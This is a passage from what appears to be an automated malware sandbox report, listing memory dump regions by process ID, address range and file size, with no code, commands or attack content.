                                                                                                                                                                                                                                                                                                    • memory/2760-277-0x0000000000D60000-0x0000000000E36000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      856KB

                                                                                                                                                                                                                                                                                                    • memory/2760-289-0x0000000000400000-0x00000000008F1000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4.9MB

                                                                                                                                                                                                                                                                                                    • memory/3044-348-0x0000000077410000-0x000000007759E000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      1.6MB

                                                                                                                                                                                                                                                                                                    • memory/3044-378-0x0000000007130000-0x0000000007131000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/3044-139-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/3260-134-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/3344-255-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/3344-205-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/3540-324-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/3584-335-0x0000000140000000-0x0000000140C27000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      12.2MB

                                                                                                                                                                                                                                                                                                    • memory/3584-149-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/3584-200-0x0000000140000000-0x0000000140C27000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      12.2MB

                                                                                                                                                                                                                                                                                                    • memory/3584-188-0x0000000140000000-0x0000000140C27000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      12.2MB

                                                                                                                                                                                                                                                                                                    • memory/3584-174-0x0000000140000000-0x0000000140C27000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      12.2MB

                                                                                                                                                                                                                                                                                                    • memory/3612-197-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/3688-214-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/3804-276-0x0000000004A00000-0x0000000004A1F000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      124KB

                                                                                                                                                                                                                                                                                                    • memory/3804-283-0x0000000004AB0000-0x0000000004ACD000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      116KB

                                                                                                                                                                                                                                                                                                    • memory/3804-270-0x0000000000400000-0x0000000002DBC000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      41.7MB

                                                                                                                                                                                                                                                                                                    • memory/3804-231-0x00000000001C0000-0x00000000001F0000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      192KB

                                                                                                                                                                                                                                                                                                    • memory/3804-292-0x00000000051F3000-0x00000000051F4000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/3804-185-0x00000000030B1000-0x00000000030D4000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      140KB

                                                                                                                                                                                                                                                                                                    • memory/3804-280-0x00000000051F2000-0x00000000051F3000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/3804-299-0x00000000051F4000-0x00000000051F6000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                    • memory/3804-141-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/3804-281-0x00000000051F0000-0x00000000051F1000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/3816-119-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4020-223-0x0000000000457320-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4020-265-0x0000000000400000-0x0000000002DE8000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      41.9MB

                                                                                                                                                                                                                                                                                                    • memory/4020-286-0x0000000003090000-0x000000000311E000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      568KB

                                                                                                                                                                                                                                                                                                    • memory/4020-267-0x0000000002F94000-0x0000000002FE3000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      316KB

                                                                                                                                                                                                                                                                                                    • memory/4020-275-0x0000000000400000-0x0000000002DE8000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      41.9MB

                                                                                                                                                                                                                                                                                                    • memory/4020-189-0x0000000000400000-0x0000000002DE8000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      41.9MB

                                                                                                                                                                                                                                                                                                    • memory/4020-306-0x0000000000400000-0x0000000002DE8000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      41.9MB

                                                                                                                                                                                                                                                                                                    • memory/4184-477-0x0000000000BF2000-0x0000000000BF4000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                    • memory/4184-479-0x0000000000BF5000-0x0000000000BF6000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/4184-473-0x0000000000BF0000-0x0000000000BF2000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                    • memory/4184-478-0x0000000000BF4000-0x0000000000BF5000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/4184-398-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4188-357-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4224-406-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4224-416-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/4312-341-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4352-232-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4360-282-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4364-313-0x00000000019B0000-0x00000000019B1000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/4364-310-0x00000000004368BE-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4364-309-0x0000000000400000-0x000000000043C000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      240KB

                                                                                                                                                                                                                                                                                                    • memory/4364-319-0x00000000059D0000-0x00000000059D1000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/4368-395-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4368-401-0x0000000000400000-0x000000000046D000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      436KB

                                                                                                                                                                                                                                                                                                    • memory/4408-355-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4456-284-0x000000001BBF0000-0x000000001BBF2000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                    • memory/4456-257-0x0000000000E20000-0x0000000000E21000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/4456-237-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4480-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4516-474-0x0000000000790000-0x0000000000792000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                    • memory/4520-404-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4520-241-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4520-261-0x0000000000B85000-0x0000000000B95000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                                                                                                    • memory/4556-260-0x0000000000900000-0x00000000009AE000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      696KB

                                                                                                                                                                                                                                                                                                    • memory/4556-266-0x0000000000C10000-0x0000000000C22000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      72KB

                                                                                                                                                                                                                                                                                                    • memory/4556-243-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4560-305-0x00000000023E0000-0x00000000023E2000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                    • memory/4560-296-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4568-371-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4668-352-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4668-361-0x0000000077410000-0x000000007759E000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      1.6MB

                                                                                                                                                                                                                                                                                                    • memory/4668-383-0x00000000056E0000-0x00000000056E1000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/4676-318-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4708-419-0x000001E733D80000-0x000001E733D82000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                    • memory/4708-421-0x000001E733D83000-0x000001E733D85000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                    • memory/4708-443-0x000001E733D86000-0x000001E733D88000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                    • memory/4708-389-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4760-252-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4760-328-0x00000000056B0000-0x00000000057FA000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      1.3MB

                                                                                                                                                                                                                                                                                                    • memory/4808-258-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4844-445-0x0000018BC5FB0000-0x0000018BC5FB2000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                    • memory/4844-471-0x0000018BC5FB2000-0x0000018BC5FB4000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                    • memory/4844-472-0x0000018BC5FB4000-0x0000018BC5FB5000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/4844-349-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4852-330-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4900-259-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4984-264-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/5048-476-0x0000000140000000-0x0000000140009000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                                                                                                    • memory/5052-301-0x000001CB586E0000-0x000001CB586E2000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                    • memory/5052-294-0x000001CB3E470000-0x000001CB3E472000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                    • memory/5052-302-0x000001CB3E470000-0x000001CB3E472000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                    • memory/5052-308-0x000001CB3FED0000-0x000001CB3FED1000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/5052-363-0x000001CB586E6000-0x000001CB586E8000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                    • memory/5052-333-0x000001CB5A7D0000-0x000001CB5A7D1000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/5052-321-0x000001CB3FF30000-0x000001CB3FF31000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/5052-307-0x000001CB3FFC0000-0x000001CB3FFC1000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/5052-291-0x000001CB3E470000-0x000001CB3E472000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                    • memory/5052-304-0x000001CB586E3000-0x000001CB586E5000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                    • memory/5052-268-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/5052-300-0x000001CB3E470000-0x000001CB3E472000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                    • memory/5052-297-0x000001CB3E470000-0x000001CB3E472000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                    • memory/5096-271-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/5108-272-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/5116-394-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/5116-414-0x0000000000400000-0x000000000089E000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4.6MB

                                                                                                                                                                                                                                                                                                    • memory/5116-412-0x0000000000AC0000-0x0000000000B09000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      292KB

                                                                                                                                                                                                                                                                                                    • memory/5304-475-0x0000000001840000-0x0000000001842000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                    • memory/5552-436-0x0000000002660000-0x0000000002662000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                    • memory/5812-452-0x0000000000030000-0x0000000000039000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                                                                                                    • memory/5812-454-0x0000000000400000-0x0000000000885000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4.5MB